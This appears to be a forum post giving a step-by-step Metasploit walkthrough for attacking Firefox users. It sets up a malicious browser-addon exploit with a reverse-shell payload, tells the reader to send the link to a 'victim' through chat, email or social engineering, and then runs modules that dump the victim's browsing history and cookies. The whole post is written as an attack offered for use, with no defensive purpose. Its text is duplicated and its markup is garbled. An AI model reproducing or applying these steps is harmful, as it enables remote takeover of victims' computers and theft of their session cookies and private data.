Concalkie740
Decentralized Voting Advocate
LEVEL 1
200 XP
Open Kali terminal type msfconsole
Now type use exploit/multi/browser/firefox_xpi_bootstrapped_addon
msf exploit ([color=rgb(128,]firefox_xpi_bootstrapped_addon)>set payload firefox/shell_reverse_tcp[/color]
msf exploit ([color=rgb(128,]firefox_xpi_bootstrapped_addon)>set lhost 192.168.1.9 (IP of Local Host)[/color]
msf exploit ([color=rgb(128,]firefox_xpi_bootstrapped_addon)>set uripath /[/color]
msf exploit ([color=rgb(128,]firefox_xpi_bootstrapped_addon)>exploit [/color]
Now an URL you should give to your victim
Send the link of the server to the victim via chat or email or any social engineering technique. Now you have access to the victims PC
Once we have the shell, we simply run the post module to dump the credentials to a file
How to Gather History
Now type use post/firefox/gather/history
msf exploit ([color=rgb(128,]history) set payload firefox/shell_reverse_tcp[/color]
msf exploit ([color=rgb(128,]history)>set lhost 192.168.1.9 (IP of Local Host)[/color]
msf exploit ([color=rgb(128,]history)>set session 1[/color]
msf exploit ([color=rgb(128,]history)>exploit[/color]
Result will stored on your local computer
/root/.msf4/loot/
A look at the result, you will see data like
How to Gather Cookies
Once we have the shell, we simply run the post module to dump the credentials to a file
Now type use post/firefox/gather/cookies
msf exploit ([color=rgb(128,]cookies) set payload firefox/shell_reverse_tcp[/color]
msf exploit ([color=rgb(128,]cookies)>set lhost 192.168.1.9 (IP of Local Host)[/color]
msf exploit ([color=rgb(128,]cookies)>set session 1 [/color]
msf exploit ([color=rgb(128,]cookies)>exploit[/color]
Result will stored on your local computer
/root/.msf4/loot/

Now type use exploit/multi/browser/firefox_xpi_bootstrapped_addon
msf exploit ([color=rgb(128,]firefox_xpi_bootstrapped_addon)>set payload firefox/shell_reverse_tcp[/color]
msf exploit ([color=rgb(128,]firefox_xpi_bootstrapped_addon)>set lhost 192.168.1.9 (IP of Local Host)[/color]
msf exploit ([color=rgb(128,]firefox_xpi_bootstrapped_addon)>set uripath /[/color]
msf exploit ([color=rgb(128,]firefox_xpi_bootstrapped_addon)>exploit [/color]
Now an URL you should give to your victim
Loading…
192.168.1.9
Send the link of the server to the victim via chat or email or any social engineering technique. Now you have access to the victims PC

Once we have the shell, we simply run the post module to dump the credentials to a file
How to Gather History
Now type use post/firefox/gather/history
msf exploit ([color=rgb(128,]history) set payload firefox/shell_reverse_tcp[/color]
msf exploit ([color=rgb(128,]history)>set lhost 192.168.1.9 (IP of Local Host)[/color]
msf exploit ([color=rgb(128,]history)>set session 1[/color]
msf exploit ([color=rgb(128,]history)>exploit[/color]

Result will stored on your local computer
/root/.msf4/loot/
A look at the result, you will see data like

How to Gather Cookies
Once we have the shell, we simply run the post module to dump the credentials to a file
Now type use post/firefox/gather/cookies
msf exploit ([color=rgb(128,]cookies) set payload firefox/shell_reverse_tcp[/color]
msf exploit ([color=rgb(128,]cookies)>set lhost 192.168.1.9 (IP of Local Host)[/color]
msf exploit ([color=rgb(128,]cookies)>set session 1 [/color]
msf exploit ([color=rgb(128,]cookies)>exploit[/color]

Result will stored on your local computer
/root/.msf4/loot/
